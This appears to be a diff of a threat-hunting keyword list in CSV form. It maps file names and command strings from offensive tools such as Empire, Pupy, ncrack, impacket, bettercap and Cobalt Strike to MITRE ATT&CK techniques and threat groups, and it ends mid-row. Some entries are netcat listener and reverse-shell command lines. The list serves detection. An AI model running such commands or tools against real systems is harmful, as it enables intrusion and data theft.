Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*NBNSBruteForcePause*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*NBNSBruteForceSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*NBNSBruteForceTarget*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*nbnsspoof.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*NBNSSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - 
Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Naughty-Script.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*NBNSBruteForceHost*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*NBNSBruteForcePause*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*NBNSBruteForceSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*NBNSBruteForceTarget*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*nbnsspoof.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*NBNSSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - 
Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*nc 127.0.0.1 4000*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" "*nc -nlvp 4444*","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","0","N/A","N/A","1","56","11","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" -"*nc -vlp 4444*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*nc -vlp 4445*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*nc.exe 127.0.0.1 4444*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - 
TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*nc.exe -l -p 1337*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*nccgroup/demiguise*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. 
and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","1","N/A","9","10","1321","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"*nc -vlp 4444*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*nc -vlp 4445*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*nc.exe 127.0.0.1 4444*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*nc.exe -l -p 1337*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*nccgroup/demiguise*","offensive_tool_keyword","demiguise","The aim 
of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","1","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "*ncrack-*.dmg*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" "*ncrack-*-setup.exe*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" "*ncrack.exe*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" "*NcrackInstaller.exe*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential 
Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" "*ncrack-master.zip*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" "*ncrack-services*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" -"*ndDelegation.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*ndp_spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*Ne0nd0g/merlin*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*ndDelegation.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ndp_spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*Ne0nd0g/merlin*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" "*needle_sift.x64*","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
